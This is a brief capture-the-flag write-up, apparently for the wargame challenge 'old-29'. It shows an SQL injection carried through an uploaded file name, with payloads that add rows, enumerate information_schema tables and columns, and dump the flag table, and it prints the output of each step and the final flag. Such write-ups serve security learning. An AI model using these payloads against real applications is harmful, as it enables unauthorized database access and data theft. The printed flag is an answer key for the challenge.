old-29 -- SQLi (via Filename)



Last updated



Last updated
INSERT INTO files (time, ip, file) VALUES (NOW(), PUBLIC_IP, file_input);
SELECT time, ip, file FROM files;filename'),(1337,'8.8.8.8','injected"test', 1337,'PUBLIC_IP'),('injectedx',1,'x'),(database(),1,'PUBLIC_IP')#
---
1970-01-01 09:00:01 | PUBLIC_IP | chall29x',1,'x'),((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),1,'PUBLIC_IP')#
---
1970-01-01 09:00:01 | PUBLIC_IP | files,flag_congratzx',1,'x'),((SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag_congratz'),1,'PUBLIC_IP')#
---
1970-01-01 09:00:01 | PUBLIC_IP | flagx',1,'x'),((SELECT GROUP_CONCAT(flag) FROM flag_congratz),1,'PUBLIC_IP')#
---
1970-01-01 09:00:01 | PUBLIC_IP | FLAG{didYouFeelConfused?_sorry:)}